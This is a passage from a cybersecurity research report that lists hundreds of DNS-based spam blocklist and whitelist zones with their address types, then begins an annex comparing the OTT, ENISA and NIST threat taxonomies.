90 completewhois arin- ipv4 - - Bogons newer main.bogons.dnsiplists.completewhois. (used after 1995) com ARIN blocks

91 completewhois ripe- ipv4 - - Bogons RIPE NCC main.bogons.dnsiplists.completewhois. main ip blocks com

92 completewhois combined- ipv4 - - combined HIB HIB.dnsiplists.completewhois.com

93 completewhois country- ipv4 - - Country Rirdata rirdata.dnsiplists.completewhois.com

94 completewhois bogons.dnsiplists.completewhois.com ipv4 - - entire Bogons

dataset

95 completewhois hijacked.dnsiplists.completewhois.com ipv4 - - Hijacked IP blocks

96 completewhois invalidipwhois.dnsiplists.completewhoi ipv4 - - Invalid IP Whois s.com blocks

97 compu.net blackhole.compu.net ipv4 - - blackhole

98 compu.net pacbelldsl.compu.net ipv4 - - pacbelldsl

99 compu.net pm0- pm0-no-more.compu.net ipv4 - - no-more

100 D. D. N. S. B. L. (old ddnsbl.internetdefensesystems.com ipv4 - - domain)

101 dev.null.dk dev.null.dk ipv4 - -

102 dews.qmail.org dews.qmail.org ipv4 - -

103 dnsbl.clue-by- dnsbl.clue-by-4.org ipv4 - - 4.org

104 dnsbl.cmbix.com dnsbl.cmbix.com ipv4 - -

105 dnsbl.delink.net dnsbl.delink.net ipv4 - -

106 dnsbl.ioerror.us dnsbl.ioerror.us ipv4 - -

107 dnsbl.ipocalypse.n dnsbl.ipocalypse.net ipv4 - - et

108 dnsbl.mags.net dnsbl.mags.net ipv4 - -

109 dnsbl.net.au (ahrh) ahrh.dnsbl.net.au ipv4 - dom

110 dnsbl.net.au (endl) endl.dnsbl.net.au ipv4 - -

111 dnsbl.net.au endn.dnsbl.net.au - - dom (endn)

112 dnsbl.net.au enpb.dnsbl.net.au ipv4 - - (enpb)

113 dnsbl.net.au (jwrh) jwrh.dnsbl.net.au - - dom

114 dnsbl.net.au ohps.dnsbl.net.au ipv4 - - (ohps)

115 dnsbl.net.au omrs.dnsbl.net.au ipv4 - - (omrs)

116 dnsbl.net.au (osps) osps.dnsbl.net.au ipv4 - -

117 dnsbl.net.au (osrs) osrs.dnsbl.net.au ipv4 - -

118 dnsbl.net.au (owfs) owfs.dnsbl.net.au ipv4 - -

119 dnsbl.net.au owps.dnsbl.net.au ipv4 - - (owps)

120 dnsbl.net.au probes.dnsbl.net.au ipv4 - - (probes)

121 dnsbl.net.au (rddn) rddn.dnsbl.net.au - - dom

122 dnsbl.net.au (rdts) rdts.dnsbl.net.au ipv4 - -

123 dnsbl.net.au (ricn) ricn.dnsbl.net.au ipv4 - -

124 dnsbl.net.au (rmst) rmst.dnsbl.net.au ipv4 - -

125 dnsbl.net.au (t1) t1.dnsbl.net.au ipv4 - -

126 dnsbl.net.au (t2) t2.dnsbl.net.au ipv4 - -

127 dnsbl.net.au (t3) t3.dnsbl.net.au ipv4 - -

128 dnsbl.net.au t3direct.dnsbl.net.au ipv4 - - (t3direct)

129 dnsbl.pagedirect.n dnsbl.pagedirect.net ipv4 - - et

130 dnsbl.regedit64.ne dnsbl.regedit64.net ipv4 - - t

131 dnsbl.technoirc.or dnsbl.technoirc.org ipv4 - - g

132 DNSRBL.net dun dun.dnsrbl.net ipv4 - -

133 DNSRBL.net spam spam.dnsrbl.net ipv4 - -

134 dorkslayers orbs orbs.dorkslayers.com ipv4 - -

135 dorkslayers relays relays.dorkslayers.com ipv4 - -

136 dorkslayers ztl ztl.dorkslayers.com ipv4 - -

137 DRBL be.net.ru devnull.drbl.be.net.ru ipv4 - - (devnull node)

138 DRBL be.net.ru proxy.drbl.be.net.ru ipv4 - - (proxy node)

139 DRBL be.net.ru vote.drbl.be.net.ru ipv4 - - (vote node)

140 DRBL croco.net vote.drbl.croco.net ipv4 - - (vote node)

141 DRBL croco.net work.drbl.croco.net ipv4 - - (work node)

142 DRBL vote.drbl.dataforce.net ipv4 - - dataforce.net (vote node)

143 DRBL work.drbl.dataforce.net ipv4 - - dataforce.net (work node)

144 DRBL drand.net spamflood.drbl.drand.net ipv4 - - (spamflood vote node)

145 DRBL drand.net spamprobe.drbl.drand.net ipv4 - - (spamprobe vote node)

146 DRBL drand.net spamtrap.drbl.drand.net ipv4 - - (spamtrap vote node)

147 DRBL drand.net vote.drbl.drand.net ipv4 - - (vote node)

148 DRBL drand.net work.drbl.drand.net ipv4 - -

(work node)

149 DRBL drbl.ks.cz autowork.drbl.ks.cz ipv4 - - (autowork node)

150 DRBL drbl.ks.cz czdynamic.drbl.ks.cz ipv4 - - (czdynamic node)

151 DRBL drbl.ks.cz vote1.drbl.ks.cz ipv4 - - (vote1 node)

152 DRBL drbl.ks.cz work.drbl.ks.cz ipv4 - - (work node)

153 DRBL host.kz (vote vote.drbl.host.kz ipv4 - - node)

154 DRBL host.kz (work work.drbl.host.kz ipv4 - - node)

155 DRBL ntvinet.net vote.rbl.ntvinet.net ipv4 - - (vote node)

156 DRBL ntvinet.net rbl.ntvinet.net ipv4 - - (work node)

157 DRBL sandy.ru dialup.drbl.sandy.ru ipv4 - - (dialup vote node)

158 DRBL sandy.ru vote.drbl.sandy.ru ipv4 - - (vote node)

159 DRBL sandy.ru work.drbl.sandy.ru ipv4 - - (work node)

160 dronebl.noderebel dronebl.noderebellion.net ipv4 - - lion.net

161 DSBL.org ? list dsbl.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

162 DSBL.org multihop multihop.dsbl.org ipv4 - - smtp relays

163 DSBL.org trusted list.dsbl.org ipv4 - - list

164 DSBL.org unconfirmed.dsbl.org ipv4 - - unconfirmed list

165 EasyNet blackholes blackholes.easynet.nl ipv4 - -

166 EasyNet dynablock dynablock.easynet.nl ipv4 - -

167 EasyNet proxies proxies.blackholes.easynet.nl ipv4 - - blackholes

168 EasyNet spamdomains.blackholes.easynet.nl - - dom spamdomains blackholes

169 EFnet #help RBL rbl.efnethelp.net ipv4 - -

170 ePaxsys dyn DNSBL dyn.dnsbl.epaxsys.net ipv4 - -

171 ePaxsys dyn2 dyn2.dnsbl.epaxsys.net ipv4 - - DNSBL

172 Exsilia proxies proxies.exsilia.net ipv4 - -

173 Exsilia spam spam.exsilia.net ipv4 - -

174 EZNetTools RBL rbl.eznettools.com ipv4 - -

175 Financial Services dnswl.leisi.net ipv4 - - Whitelist

176 flowgoaway.com flowgoaway.com ipv4 - -

177 Gweep Systems msgid.bl.gweep.ca ipv4 - - msgid

178 Gweep Systems proxy.bl.gweep.ca ipv4 - - proxy

179 Gweep Systems random.bl.gweep.ca ipv4 - - random

180 Gweep Systems relays.bl.gweep.ca ipv4 - - relays

181 hilli.dk local blocked.hilli.dk ipv4 - - blocklist

182 IIP Blacklist lookup.dnsbl.iip.lu ipv4 - -

183 imrss.org DSSL dssl.imrss.org ipv4 - -

184 imrss.org MR-OUT mr-out.imrss.org ipv4 - -

185 inflow.noflow.org inflow.noflow.org ipv4 - -

186 Intercept DNS intercept.datapacket.net ipv4 - - Blacklist

187 Intersil Blackholes blackholes.intersil.net ipv4 - -

188 IPQuery.org any any.dnsl.ipquery.org ipv4 - -

189 IPQuery.org backscat.dnsl.ipquery.org ipv4 - - backscat

190 IPQuery.org netblock.dnsl.ipquery.org ipv4 - - netblock

191 IPQuery.org relay relay.dnsl.ipquery.org ipv4 - -

192 IPQuery.org single single.dnsl.ipquery.org ipv4 - -

193 IPv6 Mailserver rbl.ipv6wl.eu - ipv6 - Whitelist

194 IPv6-World.net rbl rbl.ipv6-world.net - ipv6 -

195 JAMMConsulting.c dnsbl.jammconsulting.com ipv4 - - om dnsbl

196 JIPPG's RBL Project dialup.blacklist.jippg.org ipv4 - - (dialup Listings)

197 JIPPG's RBL Project jp.dialup.blacklist.jippg.org ipv4 - - (jp dialup Listings)

198 JIPPG's RBL Project non-jp.dialup.blacklist.jippg.org ipv4 - - (non-jp dialup Listings)

199 Karmasphere karmasphere.email- ipv4 - - DNSBL sender.dnsbl.karmasphere.com

200 Karmasphere karmasphere.email- ipv4 - -

DNSWL sender.dnswl.karmasphere.com

201 Kewlio.net TOR is-tor.kewlio.net.uk ipv4 - - node checker

202 Kropka all all.rbl.kropka.net ipv4 - -

203 Kropka backscatter backscatter.rbl.kropka.net ipv4 - -

204 Kropka dialup dialup.rbl.kropka.net ipv4 - -

205 Kropka form form.rbl.kropka.net ipv4 - -

206 Kropka ip ip.rbl.kropka.net ipv4 - -

207 Kropka lame-av lame-av.rbl.kropka.net ipv4 - -

208 Kropka op op.rbl.kropka.net ipv4 - -

209 Kropka or or.rbl.kropka.net ipv4 - -

210 lbl.lagengymnastik lbl.lagengymnastik.dk ipv4 - - .dk

211 lbl.lagengymnastik bogon.lbl.lagengymnastik.dk ipv4 - - .dk (bogon)

212 lbl.lagengymnastik policy.lbl.lagengymnastik.dk ipv4 - - .dk (policy)

213 lbl.lagengymnastik spam.lbl.lagengymnastik.dk ipv4 - - .dk (spam)

214 LUCKYSEVEN (fake luckyseven.dnsbl.net ipv4 - - blacklist)

215 LumberCartel.org cbs.lumbercartel.org ipv4 - - cbs (clueless bounce senders)

216 LumberCartel.org jms.lumbercartel.org ipv4 - - jms (junk mail senders)

217 LumberCartel.org whitelist.lumbercartel.org ipv4 - - whitelist

218 mail.people.it mail.people.it ipv4 - -

219 mailabusedatabas mailabusedatabase.com ipv4 - - e RBL

220 mailabusedatabas generic.rwl.mailabusedatabase.com ipv4 - - e RWL

221 MailBlacklist.com service.mailblacklist.com ipv4 ipv6 dom EmailBlacklist

222 MailBlacklist.com service.mailwhitelist.com ipv4 ipv6 dom EmailWhitelist

223 maildeflector.net maildeflector.net ipv4 - -

224 Mailer.mobi dnsbl.mailer.mobi ipv4 - -

225 Mailhosts.org IPBL ipbl.mailhosts.org ipv4 ipv6 -

226 Mailhosts.org ipwl.mailhosts.org ipv4 ipv6 - IPWL

227 Mailhosts.org rhsbl.mailhosts.org - - dom RHSBL

228 Mailhosts.org rhswl.mailhosts.org - - dom RHSWL

229 Mailhosts.org shortlist.mailhosts.org ipv4 - - SHORTLIST

230 Mailhosts.org xpews.mailhosts.org ipv4 - - XPEWS

231 MailPolice adult adult.rhs.mailpolice.com - - dom

232 MailPolice adv adv.rhs.mailpolice.com - - dom

233 MailPolice block block.rhs.mailpolice.com - - dom

234 MailPolice bulk bulk.rhs.mailpolice.com - - dom

235 MailPolice dynamic.rhs.mailpolice.com - - dom dynamic

236 MailPolice fraud fraud.rhs.mailpolice.com ipv4 - dom

237 MailPolice porn porn.rhs.mailpolice.com - - dom

238 MailPolice redir redir.rhs.mailpolice.com - - dom

239 MailPolice webmail.rhs.mailpolice.com - - dom webmail

240 Mailprove c10.rbl.hk ipv4 - -

241 MAPS DUL dul.maps.vix.com ipv4 - - (@vix.com)

242 MAPS DUL dialups.mail-abuse.org ipv4 - - (Dynamic User List)

243 MAPS NML nml.mail-abuse.org ipv4 - -

244 MAPS NML (Non- nonconfirm.mail-abuse.org ipv4 - - confirmed Mail List)

245 MAPS OPS proxies.mail-abuse.org ipv4 - -

246 MAPS RBL rbl.mail-abuse.org ipv4 - -

247 MAPS RBL rbl.maps.vix.com ipv4 - - (@vix.com)

248 MAPS RBL blackholes.mail-abuse.org ipv4 - - (Realtime Blackhole List)

249 MAPS RBL+ rbl-plus.mail-abuse.org ipv4 - -

250 MAPS RSS (Relay relays.mail-abuse.org ipv4 - - Spam Stopper)

251 McFadden sbl.csma.biz ipv4 - - Associates E-mail Blacklist (long timeframe)

252 McFadden bl.csma.biz ipv4 - - Associates E-mail Blacklist (short timeframe)

253 MessageLabs VBL vbl.messagelabs.com ipv4 - -

254 Monkeys bandwidth-pigs.monkeys.com ipv4 - - bandwidth-pigs

255 Monkeys client- client-domain.sjesl.monkeys.com - - dom domain

256 Monkeys formmail formmail.relays.monkeys.com ipv4 - - relays

257 Monkeys helo- helo-domain.sjesl.monkeys.com - - dom domain

258 Monkeys proxies proxies.relays.monkeys.com ipv4 - - relays

259 Monkeys sender- sender-address.sjesl.monkeys.com ipv4 - - address

260 Monkeys sender- sender-domain.sjesl.monkeys.com - - dom domain

261 Monkeys sender- sender-domain- - - dom domain-validate validate.sjesl.monkeys.com

262 MW-Internet RBL rbl.mw-internet.net ipv4 - -

263 NetOp IP country.netop.org ipv4 - - geolocation

264 NJABL dnsbl.njabl.org ipv4 - -

265 NJABL bhnc (bad bhnc.njabl.org ipv4 - - host, no cookie)

266 NJABL combined combined.njabl.org ipv4 - -

267 NJABL DNSBL of dynablock.njabl.org ipv4 - - dynamic ip spaces

268 nospam.ant.pl nospam.ant.pl ipv4 - -

269 NThelp okrelays okrelays.nthelp.com ipv4 - -

270 NThelp relays relays.nthelp.com ipv4 - -

271 nzl.net isp whitelist isp.dns.nzl.net ipv4 - -

272 olsentech.net spam.olsentech.net ipv4 - - DNSBL

273 Open Whois bl.open-whois.org - - dom

274 OpenLists openlists.orbs.org ipv4 - -

275 ORBITrbl rbl.orbitrbl.com ipv4 - -

276 ORBL or.orbl.org ipv4 - -

277 ORBS delayed- delayed-outputs.orbs.org ipv4 - - outputs

278 ORBS inputs inputs.orbs.org ipv4 - -

279 ORBS manual manual.orbs.org ipv4 - -

280 ORBS outputs outputs.orbs.org ipv4 - -

281 ORBS relays relays.orbs.org ipv4 - -

282 ORBS spamsource- spamsource-netblocks.orbs.org ipv4 - - netblocks

283 ORBS spamsources spamsources.orbs.org ipv4 - -

284 ORBS untestable- untestable-netblocks.orbs.org ipv4 - - netblocks

285 ORBZ inputs orbz.gst-group.co.uk ipv4 - -

286 ORBZ manual manual.orbz.gst-group.co.uk ipv4 - -

287 orbz.org inputs inputs.orbz.org ipv4 - -

288 orbz.org outputs outputs.orbz.org ipv4 - -

289 Orca DUL dul.orca.bc.ca ipv4 - -

290 ORDB.org relays.ordb.org ipv4 - -

291 OsiruSoft blocktest.relays.osirusoft.com ipv4 - - blocktest.relays

292 OsiruSoft dialups.relays.osirusoft.com ipv4 - - dialups.relays

293 OsiruSoft inputs.relays.osirusoft.com ipv4 - - inputs.relays

294 OsiruSoft openlist.relays.osirusoft.com ipv4 - - openlist.relays

295 OsiruSoft outputs.relays.osirusoft.com ipv4 - - outputs.relays

296 OsiruSoft proxy.relays.osirusoft.com ipv4 - - proxy.relays

297 OsiruSoft relays relays.osirusoft.com ipv4 - -

298 OsiruSoft socks.relays.osirusoft.com ipv4 - - socks.relays

299 OsiruSoft spamsites.relays.osirusoft.com ipv4 - - spamsites.relays

300 OsiruSoft spamsources.relays.osirusoft.com ipv4 - - spamsources.relay s

301 Pan-Am Dynamic pdl.pan-am.ca ipv4 - - List

302 Pan-Am Dynamic pdl.bofh.it ipv4 - - List (@bofh.it)

303 Pan-Am Dynamic pdl.dnsbl.net.au ipv4 - - List (@dnsbl.net.au)

304 Pan-Am Dynamic dialups.visi.com ipv4 - - List (@visi.com)

305 Pedantic.org netblock.pedantic.org ipv4 - - netblock

306 PHPrbl rbl.init1.nl ipv4 - -

307 Polar rbl.polarcomm.net ipv4 - - Communications Admin RBL

308 ppbl.beat.st ppbl.beat.st ipv4 - -

309 proxyBL dnsbl.proxybl.org ipv4 - -

310 pss.spambusters.o pss.spambusters.org.ar ipv4 - - rg.ar

311 query.trustic.com query.trustic.com ipv4 - -

312 Quorum.to list.quorum.to ipv4 - -

313 Radparker Relay relays.radparker.com ipv4 - - Spam Stopper

314 RangersBL dnsbl.rangers.eu.org ipv4 - - combined

315 RangersBL generic dynamic.dnsbl.rangers.eu.org ipv4 - - IP range

316 RangersBL lame.dnsbl.rangers.eu.org ipv4 - - misconfigured filters

317 RangersBL spam spam.dnsbl.rangers.eu.org ipv4 - - source

318 RangersBL spam spamsupport.dnsbl.rangers.eu.org ipv4 - - supporting ISP

319 RangersBL worm.dnsbl.rangers.eu.org ipv4 - - virus/worm source

320 rbl-plus.hea.net rbl-plus.hea.net ipv4 - -

321 rbl.apluslock.com rbl.apluslock.com ipv4 - -

322 rbl.bulkfeeds.jp rbl.bulkfeeds.jp - - dom

323 rbl.echelon.pl rbl.echelon.pl ipv4 - -

324 rbl.faynticrbl.org rbl.faynticrbl.org ipv4 - -

325 rbl.firstbase.com rbl.firstbase.com ipv4 - -

326 rbl.fnidder.dk rbl.fnidder.dk ipv4 - -

327 rbl.ma.krakow.pl rbl.ma.krakow.pl ipv4 - -

328 rbl.openrbl.org rbl.openrbl.org ipv4 - -

329 rbl.pil.dk rbl.pil.dk ipv4 - -

330 rbl.rope.net rbl.rope.net ipv4 - -

331 rbl.sns.ro hardcore.rbl.sns.ro ipv4 - dom (hardcore)

332 rbl.sns.ro softcore.rbl.sns.ro ipv4 - dom (softcore)

333 rbl.spam.org.tr rbl.spam.org.tr ipv4 - -

334 rbl.stonehenge.co rbl.stonehenge.com ipv4 - - m

335 rblmap.tu- rblmap.tu-berlin.de ipv4 - - berlin.de

336 Reactive rabl.nuclearelephant.com ipv4 - - Autonomous Blackhole List

337 relays.visi.com relays.visi.com ipv4 - -

338 relaywatcher.n13 relaywatcher.n13mbl.com ipv4 - - mbl.com

339 rfc-ignorant.org abuse.rfc-ignorant.org - - dom abuse

340 rfc-ignorant.org bogusmx.rfc-ignorant.org - - dom bogusmx

341 rfc-ignorant.org dsn.rfc-ignorant.org - - dom DSN (<>)

342 rfc-ignorant.org ipwhois.rfc-ignorant.org ipv4 - - ipwhois

343 rfc-ignorant.org postmaster.rfc-ignorant.org - - dom postmaster

344 rfc-ignorant.org whois.rfc-ignorant.org - - dom whois

345 Rominet china china.rominet.net ipv4 - -

346 Rominet hong- hong-kong.rominet.net ipv4 - - kong

347 Rominet korea korea.rominet.net ipv4 - -

348 Rominet taiwan taiwan.rominet.net ipv4 - -

349 RURBL db.rurbl.ru ipv4 - -

350 Russian Dial-up dul.ru ipv4 - - User List

351 s5h.net IPv6 RBL ipv6.all.s5h.net - ipv6 -

352 sandes.dk blackholes.sandes.dk ipv4 - - blackholes

353 sandes.dk relays relays.sandes.dk ipv4 - -

354 SBBL (they.com) sbbl.they.com ipv4 - -

355 SBG-RBL.ORG dyn.sbg-rbl.org ipv4 - - (dyn)

356 SBG-RBL.ORG dyn2.sbg-rbl.org - - dom (dyn2)

357 SBG-RBL.ORG (sbg) sbg.sbg-rbl.org ipv4 - -

358 sbl.2stepback.dk sbl.2stepback.dk ipv4 - -

359 Scrollout iRBL (all (hidden) ipv4 - - categories)

360 Scrollout iRBL (all bl.scrollout.com ipv4 - - countries)

361 securityplanet.nl black.dnsbl.securityplanet.nl ipv4 - - blacklist

362 securityplanet.nl white.dnsbl.securityplanet.nl ipv4 - - whitelist

363 SecuritySage blackhole.securitysage.com - - dom RHSBL

364 selwerd XBL xbl.selwerd.cx ipv4 - -

365 SenderDB IP4R pub.senderdb.net ipv4 - - database

366 SHLINK bl bl.shlink.org ipv4 - -

367 SHLINK dmm dmm.shlink.org ipv4 - -

368 SHLINK dyn dyn.shlink.org ipv4 - -

369 SHLINK rhsbl rhsbl.shlink.org - - dom

370 SHLINK rhswl rhswl.shlink.org - - dom

371 SHLINK wl wl.shlink.org ipv4 - -

372 Shub-Inter.Net relayips.rbl.shub-inter.net ipv4 - - RelayIPs

373 Shub-Inter.Net spamips.rbl.shub-inter.net ipv4 - - SpamIPs

374 snark.net rbl.snark.net ipv4 - -

375 sober.bl.spamtrap sober.bl.spamtraps.org ipv4 - - s.org

376 Solid.net Country country.dnsbl.solid.net ipv4 - - DNSBL

377 Solid.net DNSBL dnsbl.solid.net ipv4 - -

378 Solid.net Pool pool.dnsbl.solid.net ipv4 - - DNSBL

379 SORBS ? zone sorbs.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

380 SORBS Dynamic IP dynablock.sorbs.net ipv4 - - Addresses (old)

381 souphost.com country.dnsbl.souphost.com ipv4 - - country RBL

382 Spam Grouper IP singlebl.spamgrouper.com ipv4 - - only list

383 Spam Grouper Net netblockbl.spamgrouper.com ipv4 - -

block list (old)

384 Spam-RBL map.spam-rbl.com ipv4 - -

385 spam.shri.net spam.shri.net ipv4 - -

386 spam.sux.com impersonator.lists.spam.sux.com ipv4 - - impersonator.lists

387 spam.sux.com lists lists.spam.sux.com ipv4 - -

388 spam.wonk.org spam.wonk.org ipv4 - -

389 spam.wytnij.to spam.wytnij.to ipv4 - -

390 Spamanalysis.org geobl.spamanalysis.org ipv4 - - GeoBL (deny all)

391 SpamBag Private blacklist.spambag.org ipv4 - - list

392 spamblocked asiaspam.spamblocked.com ipv4 - - asiaspam

393 spamblocked eurospam.spamblocked.com ipv4 - - eurospam

394 spamblocked isps isps.spamblocked.com ipv4 - -

395 spamblocked lacnic.spamblocked.com ipv4 - - lacnic

396 spamblocked spamsources.spamblocked.com ipv4 - - spamsources

397 spamblocked whitelist.spamblocked.com ipv4 - - whitelist

398 SpamChampuru dnsbl.spam-champuru.livedoor.com ipv4 - - DNSBL

399 Spamhaus SBL spamhaus.relays.osirusoft.com ipv4 - - (@OsiruSoft relays)

400 spamsites.org spamsites.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

401 spamsources.dnsbl spamsources.dnsbl.info ipv4 - - .info

402 spamsources.yamt spamsources.yamta.org ipv4 - - a.org

403 spbl.bl.winbots.org spbl.bl.winbots.org ipv4 - -

404 SPEWS Level 1 l1.spews.dnsbl.sorbs.net ipv4 - -

405 SPEWS Level 1 spews.relays.osirusoft.com ipv4 - - (@OsiruSoft relays)

406 SPEWS Level 2 l2.spews.dnsbl.sorbs.net ipv4 - -

407 SPEWS Level ? spews.dnsbl.net.au ipv4 - - (@dnsbl.net.au)

408 SPEWS Level ? spews.block.transip.nl ipv4 - - (@TransIP)

409 spider.realtimespi spider.realtimespiderlist.com ipv4 - - derlist.com

410 squawk.com local blocklist.squawk.com ipv4 - - blocklist

411 squawk.com local blocklist2.squawk.com ipv4 - - blocklist2

412 StopSpam.org badhost.stopspam.org ipv4 - - badhost

413 StopSpam.org block.stopspam.org ipv4 - - block

414 StopSpam.org dnsbl.stopspam.org ipv4 - - dnsbl

415 summersault.com bl.summersault.com ipv4 - - Blacklist

416 summersault.com wl.summersault.com ipv4 - - Whitelist

417 SURBL ab ab.surbl.org ipv4 - dom

(AbuseButler web sites)

418 SURBL jp jp.surbl.org ipv4 - dom (jwSpamSpy + Prolocation sites)

419 SURBL multi surbl.dnsbl.net.au ipv4 - dom (@dnsbl.net.au)

420 SURBL ob ob.surbl.org ipv4 - dom (Outblaze URI blacklist)

421 SURBL ph (Phishing ph.surbl.org ipv4 - dom and malware sites)

422 SURBL sc sc.surbl.org ipv4 - dom (SpamCop web sites)

423 SURBL ws (sa- ws.surbl.org ipv4 - dom blacklist web sites)

424 SURBL xs xs.surbl.org ipv4 - dom (snowshoe and pill domains)

425 SwiftBL dnsbl.swiftbl.org ipv4 - -

426 Technovision bl.technovision.dk ipv4 - - Spamsource List

427 TechTheft DNSBL bl.techtheft.info ipv4 - -

428 TechTheft DNSBL bogon.bl.techtheft.info ipv4 - - bogon

429 TechTheft DNSBL conferr.bl.techtheft.info ipv4 - - conferr

430 TechTheft DNSBL domain.bl.techtheft.info ipv4 - - domain

431 TechTheft DNSBL expanded.bl.techtheft.info ipv4 - - expanded

432 TechTheft DNSBL isp.bl.techtheft.info ipv4 - - isp

433 TechTheft DNSBL nana.bl.techtheft.info ipv4 - - nana

434 TechTheft DNSBL other.bl.techtheft.info ipv4 - - other

435 TechTheft DNSBL robot.bl.techtheft.info ipv4 - - robot

436 TechTheft DNSBL scanning.bl.techtheft.info ipv4 - - scanning

437 TechTheft DNSBL source.bl.techtheft.info ipv4 - - source

438 TechTheft DNSBL support.bl.techtheft.info ipv4 - - support

439 TechTheft DNSBL virus.bl.techtheft.info ipv4 - - virus

440 TechTheft DNSBL watchlist.bl.techtheft.info ipv4 - - watchlist

441 TechTheft DNSBL web.bl.techtheft.info ipv4 - - web

442 TechTheft DNSBL whitelist.bl.techtheft.info ipv4 - - whitelist

443 TechTheft DNSBL whitelist.techtheft.info ipv4 - - whitelist (old zone)

444 TechTheft DNSBL bad.whois.bl.techtheft.info - - dom whois (bad)

445 TechTheft DNSBL whois.bl.techtheft.info - - dom whois (combined)

446 TechTheft DNSBL good.whois.bl.techtheft.info - - dom whois (good)

447 test.blocklist.org test.blocklist.org ipv4 - -

448 the-carrot-and- reject.the-carrot-and-the-stick.com ipv4 - - the-stick.com BL

449 the-carrot-and- accept.the-carrot-and-the-stick.com ipv4 - - the-stick.com WL

450 TQMCube China prc.tqmcube.com ipv4 - -

451 TQMCube dnsbl.tqmcube.com ipv4 - - Composite

452 TQMCube Dynamic dhcp.tqmcube.com ipv4 - - Ranges

453 TQMCube South ko.tqmcube.com ipv4 - - Korea

454 TQMCube Spam spam.tqmcube.com ipv4 - - Trap

455 TQMCube world world.tqmcube.com ipv4 - -

456 TransIP proxy proxy.block.transip.nl ipv4 - -

457 TransIP residential residential.block.transip.nl ipv4 - -

458 TransIP spamdomain.block.transip.nl - - dom spamdomain

459 TransIP spamsource.block.transip.nl ipv4 - - spamsource

460 TRBL spamtrap.trblspam.com ipv4 - -

461 TRIUMF.ca DNSBL rbl.triumf.ca ipv4 - - (old zone)

462 Trust My Mail trust.trustmymail.org ipv4 - -

463 Trusted Forwarder wl.trusted-forwarder.org ipv4 - dom SPF Global Whitelist

464 UCEB blackholes.uceb.org ipv4 - -

465 UCEPROTECT Level ucepn.dnsbl.net.au ipv4 - - ? (@dnsbl.net.au)

466 uib.no blacklist rbl.uib.no ipv4 - -

467 uib.no whitelist rbl-ok.uib.no ipv4 - -

468 Unsubscribe ubl.lashback.com ipv4 - - Blacklist UBL (@LashBack)

469 Uppsala University intruders.docs.uu.se ipv4 - - BL

470 v6net.org spammers.v6net.org ipv4 - -

471 Verio Block List vbl.mookystick.com ipv4 - -

472 Virbl whitelist nlwhitelist.dnsbl.bit.nl ipv4 - -

473 vox.schpider.com vox.schpider.com ipv4 - -

474 Web-o-Trust cabal.web-o-trust.org ipv4 - -

475 WebEquipped.com dnsbl.webequipped.com ipv4 - - block list

476 will-spam-for- will-spam-for-food.eu.org ipv4 - - food.eu.org

477 wirehub.net blackholes.wirehub.net ipv4 - - blackholes

478 wirehub.net wpb.bl.reynolds.net.au ipv4 - - blackholes (@reynolds.net.au )

479 wirehub.net dynablock.wirehub.net ipv4 - - dynablock

480 wirehub.net proxies.blackholes.wirehub.net ipv4 - - proxies blackholes

481 WPBL - Weighted wpbl.dnsbl.net.au ipv4 - - Private Block List (@dnsbl.net.au)

482 WPBL - Weighted dnsbl.wpbl.pc9.org ipv4 - - Private Block List

(old zone)

483 ybl.megacity.org ybl.megacity.org ipv4 - -

484 Zap Junk spam.zapjunk.com ipv4 - -

485 ZetaBL dnsbl.zetabl.org ipv4 - -

486 ZoneEdit zebl.zoneedit.com - - dom combined RHSBL

487 ZoneEdit deny DNS ban.zebl.zoneedit.com - - dom services domains

488 zta.birdsong.org zta.birdsong.org ipv4 - -

17 Annex C Threat Taxonomy Comparisons

Threat Taxonomy Comparisons

A comparative case study by SANS169 utilizing different threat taxonomies for threat scenarios with different risk frameworks, or the same risk framework with different assessment techniques are two possible evaluation ideas. Keys to success for this implementation would include mapping to security controls, like NIST SP 800-53, or security requirements, like NIST SP 800-171, and calculating probabilities of occurrence and impact based on changes to the threat landscape.

OTT Threat Actions & Ratings

Physical Threats • Loss of Property • Theft of Property • Accidental Destruction of Property • Natural Destruction of Property • Intentional Destruction of Property • Intentional Sabotage of Property • Intentional Vandalism of Property

Resource Threats • Disruption of Water Resources • Disruption of Emergency Services Disruption • Disruption of Fuel Resources of Governmental Services • Disruption of Materials Resources • Supplier Viability • Disruption of Electrical Resources • Supplier Supply Chain Failure • Disruption of Transportation Services • Logistics Provider Failures • Disruption of Communications Services • Logistics Route Disruptions • Technology Services Manipulation

Personnel Threats • Personnel Labour / Skills Shortage • Loss of Personnel Resources • Social Engineering of Personnel Resources

Technical Threats

169 SANS – April 2018 - https://www.sans.org/reading-room/whitepapers/threatintelligence/paper/38360 Copyright SAINT Consortium. All rights reserved. 157 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

• Organizational Fingerprinting via Open Sources • System Fingerprinting • Credential Discovery • Misuse of System Credentials • Escalation of Privilege • Abuse of System Privileges • Memory Manipulation • Cache Poisoning • Physical Manipulation of Technical Device • Manipulation of Trusted System

ENISA Threat Taxonomy

Physical attack (deliberate/ intentional)

• Fraud • Sabotage • Vandalism • Theft (devices, storage media and documents) • Information leakage/sharing

Unintentional damage / loss of information or IT assets • Information leakage/sharing due to human error • Damage caused by a third party • Erroneous use or administration of devices and • Damages resulting from penetration testing systems • Loss of information in the cloud • Using information from an unreliable source • Loss of (integrity of) sensitive information • Unintentional change of data in an information • Loss of devices, storage media and system documents • Inadequate design and planning or improper • Destruction of records adaptation Disaster (natural, environmental) • Disaster (natural earthquakes, floods, landslides, • Explosion tsunamis, heavy rains, heavy snowfalls, heavy winds) • Dangerous radiation leak • Fire • Unfavourable climatic conditions • Pollution, dust, corrosion • Major events in the environment • Thunder stroke • Threats from space / Electromagnetic storm • Water • Wildlife

Failures/ Malfunction • Failure of devices or systems • Failure or disruption of service providers • Failure or disruption of communication links (supply chain) (communication networks) • Malfunction of equipment (devices or • Failure or disruption of main supply systems)

Outages

• Loss of resources • Absence of personnel • Strike

Eavesdropping/ Interception/ Hijacking • War driving • Network Reconnaissance, Network traffic • Intercepting compromising emissions manipulation and Information gathering • Interception of information • Man in the middle/ Session hijacking • Interfering radiation • Replay of messages

Nefarious Activity/ Abuse • Identity theft (Identity Fraud/ Account) • Receive of unsolicited E-mail • Denial of service • Malicious code/ software/ activity • Social Engineering • Abuse of Information Leakage • Generation and use of rogue certificates • Manipulation of hardware and software • Manipulation of information • Misuse of audit tools

Legal • Violation of laws or regulations / Breach of legislation • Failure to meet contractual requirements NIST Risk Assessment Threat Event Taxonomy Exemplary

Adversarial

